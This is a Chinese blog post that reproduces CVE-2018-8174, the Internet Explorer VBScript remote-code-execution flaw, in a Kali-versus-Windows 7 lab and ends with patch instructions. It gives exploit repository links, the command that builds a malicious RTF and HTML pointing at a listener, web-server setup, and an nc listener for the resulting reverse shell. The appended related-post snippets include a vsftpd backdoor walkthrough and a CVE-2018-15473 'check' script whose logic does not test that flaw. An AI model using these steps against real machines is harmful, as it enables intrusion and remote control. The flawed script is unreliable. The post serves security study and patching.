CVE-2018-8174漏洞利用及漏洞加固

最新推荐文章于 2023-12-11 16:18:02 发布
最新推荐文章于 2023-12-11 16:18:02 发布
阅读量1.1k 收藏 3
点赞数 2
分类专栏: 漏洞复现 文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41924764/article/details/109254685
版权

目录

漏洞描述

  VBScript引擎处理内存中对象的方式中存在一个远程执行代码漏洞。该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式来破坏内存。成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,则成功利用此漏洞的攻击者可以控制受影响的系统。然后,攻击者可能会安装程序。查看,更改或删除数据;或创建具有完全用户权限的新帐户。

  在基于Web的攻击情形中,攻击者可能拥有一个旨在通过Internet Explorer利用此漏洞的特制网站,然后诱使用户查看该网站。攻击者还可能在承载IE呈现引擎的应用程序或Microsoft Office文档中嵌入标记为“初始化安全”的ActiveX控件。攻击者还可能利用受感染的网站以及接受或托管用户提供的内容或广告的网站。这些网站可能包含可以利用此漏洞的特制内容。


影响版本

  • Windows 7
  • Windows Server 2012 R2
  • Windows RT 8.1
  • Windows Server 2008
  • Windows Server 2012
  • Windows 8.1
  • Windows Server 2016
  • Windows Server 2008 R2
  • Windows 10
  • Windows 10服务器。

漏洞检测

https://github.com/clark515/CVE_PoC/

下载好文件后,将html文件复制到我们的web服务器上,或目标机上。

当存在CVE-2018-8174漏洞的系统利用IE去访问htm文件时,将弹出计算器。

在这里插入图片描述

漏洞利用

攻击机:kali
目标机:windows 7

下载利用脚本到kali上

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

进入文件,生成而已脚本:

cd CVE-2018-8174_EXP/
python CVE-2018-8174.py -u http://192.168.206.128/exploit.html -o exp.rtf -i 192.168.206.128 -p 4444
  • -u:URL 地址,恶意 html 文件
  • -o:生成文档
  • -i:监听地址
  • -p:监听端口
    在这里插入图片描述

复制html文件到网站目录下

cp exploit.html /var/www/html/
cp exp.rtf /var/www/html/

打开apache2服务

service apache2 start

使用nc进行端口监听

nc -lvvp 4444

当目标使用ie浏览器访问我们构造好的html文件后,即可获取shell权限

http://192.168.206.128/exploit.html

在这里插入图片描述

攻击机nc监听上线:
在这里插入图片描述

漏洞修复

补丁地址:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174

选择相对应的系统版本,例如我是 32 位 windows 7系统
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

下载好后直接运行即可

参考地址

https://www.freebuf.com/vuls/224379.html

凝聚力安全团队
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
IE双杀漏洞复现(CVE-2018-8174)
谢公子的博客
09-09 2110
目录 CVE-2018-8174双杀漏洞复现一(不稳定) 下载payload MSF监听 CVE-2018-8174双杀漏洞复现二 生成payload MSF监听 派生给CS 双杀漏洞攻击是一种新型的IE浏览器0day漏洞和新型Office文档漏洞。该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全...
CVE-2018-8174 IE浏览器远程代码执行漏洞
锋刃科技的博客
11-03 5962
0x00漏洞简介 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用 原文地址:http://www.4hou.com/vulnerable/11441.html CVE2018-8174这个漏洞是针对ie浏览器的一个远程代码执行漏洞 CVE地址:http://cve.mitre.org/cgi-bin/...
VSFTP 2.3.4(笑脸漏洞)漏洞详解
m0_64593235的博客
04-18 1761
VSFTPD 2.3.4(笑脸漏洞)漏洞详解
Metasploitable2笑脸漏洞复现
最新发布
WRplayeR的博客
12-11 503
vsftpd 2.3.4 的代码中存在几行与服务无关的代码,在检测到ftp登录的用户命中存在 :) 时会执行。再次使用ftp连接,退出后直接使用nc连接,使用whoami命令可以发现是root账户。打开6200端口,在该端口可以无需密码并且以管理员的身份进行登入。扫描,ftp打开且版本为vsftpd 2.3.4。ftp连接,并在用户名内输入包含 " :) "开启Metasploitable2靶机。192.168.232.131为靶机。再次扫描可以发现其6200端口打开,找到网段并进行网络存活主机扫描。
CVE-2018-8174漏洞两种姿势的复现
热门推荐
qq_39627497的博客
12-06 1万+
CVE-2018-8174漏洞两种姿势的复现 CVE-2018-8174漏洞两种姿势的复现 漏洞介绍: 该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该0day漏洞进行了修复,并将其命名为CVE-2018-8174。 复现过程1: 1、...
E042-服务漏洞利用加固-利用CVE-2018-12613漏洞实现远程文件包含.pdf
12-02
E042-服务漏洞利用加固-利用CVE-2018-12613漏洞实现远程文件包含
E041-服务漏洞利用加固-利用CVE-2018-4878漏洞上传实现远程控制.pdf
12-02
该课程主要讲解了如何利用CVE-2018-4878漏洞进行服务漏洞利用加固CVE-2018-4878是一个Adobe Flash Player的安全漏洞,允许攻击者通过特制的SWF文件执行任意代码,从而实现远程控制目标系统。此过程分为多个步骤...
E037-服务漏洞利用加固-利用CVE-2017-8464漏洞实现LNK文件远程代码执行.pdf
12-02
E037-服务漏洞利用加固-利用CVE-2017-8464漏洞实现LNK文件远程代码执行
CVE-2020-0796 POC 永恒之黑 POC SMBGhost POC
10-15
CVE-2020-0796 POC 利用SMBv3远程代码执行漏洞 POC 永恒之黑 POC SMBGhost POC 建议用户及时使用POC自查,如存在漏洞及时进行安全加固
windows下FTP匿名登录或弱口令漏洞及服务加固
01-10
黑客利用弱口令或匿名登录漏洞直接登录 FTP 服务,上传恶意文件,从而获取系统权限,并可能造成数据泄露。 加固方案 不同 FTP 服务软件可能有不同的防护程序,本修复方案以 Windows server 2008 中自带的 FTP 服务和...
CVE-2018-8174:通过IE VBS Engine RCE的MS Word MS WordPad
05-16
CVE-2018-8174 通过IE VBS Engine RCE的MS Word MS WordPad 通过IE VBS RCE的MS Word和MS WordPad RCE 将index.html保存到Web服务器,然后使用python脚本生成RTF漏洞利用Shellcode是从主网站下载的静态Down \ Exec Putty.exe 检查index.html的shellcode
CVE-2018-8174-msf:CVE-2018-8174-VBScript内存损坏漏洞利用
05-17
CVE-2018-8174-MSF 这是一个metasploit模块,该模块创建恶意的Word文档以利用CVE-2018-8174-VBScript内存损坏漏洞。 该模块是一个非常快速的端口,并使用在野外发现的漏洞利用示例。 该漏洞仅适用于32位Microsoft Office。 在本模块上有很多事情需要改进,但是如果有时间我会在将来进行更新。 安装 将CVE-2018-8174.rb复制到/ usr / share / metasploit-framework / modules / exploits / windows / fileformat / 将CVE-2018-8174.rtf复制到/ usr / share / metasploit-framework / data / exploits / 该漏洞无法与meterpreter shellcode一起很好地工作,因此
笑脸漏洞(VSFTPD2.3.4)复现
aarong的博客
11-01 8046
笑脸漏洞(VSFTPD2.3.4)复现 漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。 攻击机:kali linux 靶机:Metasploitable2 复现过程 Nmap扫描同网断的靶机,观察靶机上的服务开放情况: nmap 192.168.43.0/24 发现靶机开放了21端口(Ftp协议),Nmap扫描出FTP服务的版本信息,扫描结果显示ftp服务版本为VSFTPD 2.3.4
双杀 0day 漏洞CVE-2018-8174)复现
andiao1218的博客
06-12 454
漏洞描述: CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞。 微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174 由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或...
CVE-2018-2894漏洞复现
box
01-29 418
# Weblogic任意文件上传漏洞CVE-2018-2894)复现
web安全漏洞加固方案简析
weixin_34087301的博客
05-13 1791
2019独角兽企业重金招聘Python工程师标准>>> ...
CVE-2018-0802漏洞利用
weixin_33815613的博客
06-01 678
看了一天apt报告,主流利用Office鱼叉攻击的漏洞,还是这Microsoft Office CVE-2017-8570,CVE-2017-11882和CVE-2018-0802 三个,而且都知道office一般都不更新,很容易打开就中。但是doc免杀比较难,很容易被杀,比如主流的mshta这种方式。 利用脚本: https://github.com/denmilu/CVE-2018-...
RAR漏洞复现 CVE-2018-20250
R4bbit
03-07 6099
前言: 最近 Check Point安全团队又发现了WinRAR的四个漏洞 ACE文件验证逻辑绕过漏洞 [CVE-2018-20250] ACE文件名逻辑验证绕过漏 [CVE-2018-20251] ACE/RAR文件越界写入漏洞 [CVE-2018-20252] LHA/LZH文件越界写入漏洞 [CVE-2018-20253] 网上流传最多的技术复现细节就是这个ACE文件验证逻辑绕过...
Tomcat安全漏洞修改总结
金溪的博客
08-22 7369
1.删除webapps目录中的docs、examples、host-manager、manager等正式环境用不着的目录,这一步就可以解决大部分漏洞。 2.解决“slow http denial of service attack”漏洞 slow http denial of service attack漏洞是利用http post的时候,指定一个非常大的content-length,然后以很...
cve-2018-15473的漏洞验证脚本
07-27
您好!以下是一个用于验证CVE-2018-15473漏洞的简单脚本示例: ```python import paramiko def check_vulnerability(host, port, username, password): try: client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(host, port=port, username=username, password=password) print("漏洞 CVE-2018-15473 未被修复") client.close() except paramiko.AuthenticationException: print("漏洞 CVE-2018-15473 已被修复") except Exception as e: print("发生异常:", str(e)) # 使用示例 host = "目标主机IP" port = 22 # SSH端口,默认为22 username = "登录用户名" password = "登录密码" check_vulnerability(host, port, username, password) ``` 请确保安装了paramiko库(可以使用`pip install paramiko`进行安装),并将脚本中的目标主机IP、登录用户名和登录密码替换为实际值。 这个脚本尝试使用paramiko库连接到目标主机,如果成功连接,则说明漏洞CVE-2018-15473仍然存在;如果出现`AuthenticationException`异常,则说明漏洞已经被修复。对于其他异常情况,可以根据实际需要进行处理。 请注意,漏洞验证脚本仅供参考,并不能保证完全准确和全面,建议在合法授权和测试范围内使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凝聚力安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值